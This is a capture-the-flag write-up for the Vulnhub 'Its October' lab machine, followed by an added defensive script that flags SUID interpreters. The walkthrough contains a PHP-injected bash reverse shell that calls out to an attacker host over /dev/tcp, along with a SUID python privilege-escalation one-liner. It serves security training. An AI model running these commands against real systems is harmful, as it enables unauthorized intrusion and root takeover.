[VULNHUB] Its October

Today we are going to hack the Vulnhub machine called Its October. You can download it from the following link: https://www.vulnhub.com/entry/its-october-1,460/
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    ~ > nmap -A -p- 192.168.1.62
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-24 11:11 CEST
    Nmap scan report for october.home (192.168.1.62)
    Host is up (0.00031s latency).
    Not shown: 65531 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA)
    |   256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA)
    |_  256 95:1f:32:95:78:08:50:45:cd:8c:7c:71:4a:d4:6c:1c (ED25519)
    80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Homepage | My new websites
    3306/tcp open  mysql   MySQL (unauthorized)
    8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
    |_http-open-proxy: Proxy might be redirecting requests
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: My Note
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 20.94 seconds
    We visit http://192.168.1.62:8080/ and in the page source we find:
    href="mynote.txt"
    If we open the note at http://192.168.1.62:8080/mynote.txt we see that its content is:
    user - admin
    password - adminadmin2
    We save those credentials :) Then we run gobuster against port 80 to see if we can find anything interesting.
    ~ > gobuster -u http://192.168.1.62/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

    =====================================================
    Gobuster v2.0.1              OJ Reeves (@TheColonial)
    =====================================================
    [+] Mode         : dir
    [+] Url/Domain   : http://192.168.1.62/
    [+] Threads      : 10
    [+] Wordlist     : /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
    [+] Status codes : 200,204,301,302,307,403
    [+] Timeout      : 10s
    =====================================================
    2020/08/24 11:15:40 Starting gobuster
    =====================================================
    /.hta (Status: 403)
    /.htaccess (Status: 403)
    /.htpasswd (Status: 403)
    /0 (Status: 200)
    /backend (Status: 302)
    /config (Status: 301)
    /index.php (Status: 200)
    /modules (Status: 301)
    /plugins (Status: 301)
    /server-status (Status: 403)
    /storage (Status: 301)
    /themes (Status: 301)
    /vendor (Status: 301)
    =====================================================
    2020/08/24 11:17:37 Finished
    =====================================================
    We see an interesting directory called "backend". When we visit it, it asks for a user and password, so we use the ones we found earlier!
    http://192.168.1.62/backend/backend/auth/signin
    user: admin
    password: adminadmin2
    Once logged in, we go to: CMS -> Add -> Code. In the code section we put:
    function onstart(){
        exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.59/7777 0>&1'");
    }
    We give "Filename" any name, set Layout to "Default", set the title to "shell" and click Save. Then we start nc and leave it listening.
    ~ > nc -nlvp 7777
    listening on [any] 7777 ...
    With nc listening, we visit http://192.168.1.139/shell
  • Low Shell
  • We get our reverse shell :)
    ~ > nc -nlvp 7777
    listening on [any] 7777 ...
    connect to [192.168.1.59] from (UNKNOWN) [192.168.1.62] 44046
    bash: cannot set terminal process group (451): Inappropriate ioctl for device
    bash: no job control in this shell
    www-data@october:/var/www/html/octobercms$
    Once inside, we check whether there is any SUID binary that could help us escalate privileges.
    bash-5.0$ find / -perm -4000 2>/dev/null
    find / -perm -4000 2>/dev/null
    /usr/bin/newgrp
    /usr/bin/su
    /usr/bin/python3.7m
    /usr/bin/passwd
    /usr/bin/chfn
    /usr/bin/chsh
    /usr/bin/mount
    /usr/bin/umount
    /usr/bin/python3.7
    /usr/bin/gpasswd
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/openssh/ssh-keysign
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    bash-5.0$
  • Privilege Escalation
  • We see that python3.7m has the SUID bit set, so we can use it to get a privileged shell!
    bash-5.0$ python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
    python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
    bash-5.0# id
    uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
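    A small audit script, added here and not part of the original writeup, that flags SUID interpreters such as the python3.7m binary abused above: it parses a subset of the find listing from the writeup and can also walk a live filesystem. The interpreter list is an assumption for the example, not an exhaustive one.

```python
import os
import stat
import tempfile

# Interpreters and shells that should never carry the SUID bit: with euid=0
# they hand a root shell to any local user. Assumed list, not exhaustive.
RISKY_INTERPRETERS = {"python", "perl", "ruby", "php", "node", "lua",
                      "bash", "sh", "dash", "zsh", "ksh", "awk", "gawk"}

# Subset of the writeup's `find / -perm -4000` output, embedded as sample input.
FIND_OUTPUT = """/usr/bin/su
/usr/bin/python3.7m
/usr/bin/passwd
/usr/bin/python3.7
/usr/lib/dbus-1.0/dbus-daemon-launch-helper"""

def is_risky_name(name):
    """Strip a version suffix ('python3.7m' -> 'python') and check the stem."""
    return name.rstrip("0123456789.m-") in RISKY_INTERPRETERS

def audit_find_output(text):
    """Flag risky interpreters in saved output of `find / -perm -4000`."""
    paths = [ln.strip() for ln in text.splitlines() if ln.strip().startswith("/")]
    return [p for p in paths if is_risky_name(os.path.basename(p))]

def audit_tree(root):
    """Live variant: walk `root` and flag regular files with S_ISUID set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            p = os.path.join(dirpath, f)
            try:
                st = os.lstat(p)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and is_risky_name(f):
                hits.append(p)
    return sorted(hits)

def demo_tree_scan():
    """Throwaway tree: one SUID interpreter, one legitimate SUID passwd, one plain file."""
    with tempfile.TemporaryDirectory() as root:
        for name, mode in (("python3.7m", 0o4755), ("passwd", 0o4755), ("vim", 0o755)):
            p = os.path.join(root, name)
            open(p, "w").close()
            os.chmod(p, mode)
        return [os.path.basename(p) for p in audit_tree(root)]

if __name__ == "__main__":
    print(audit_find_output(FIND_OUTPUT))  # ['/usr/bin/python3.7m', '/usr/bin/python3.7']
    print(demo_tree_scan())                # ['python3.7m']
```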
  • proof.txt
  • Finally, we read the root flag!
    bash-5.0# cat proof.txt
    Best of Luck
    $2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq
  • End
  • And with that we are root on the machine.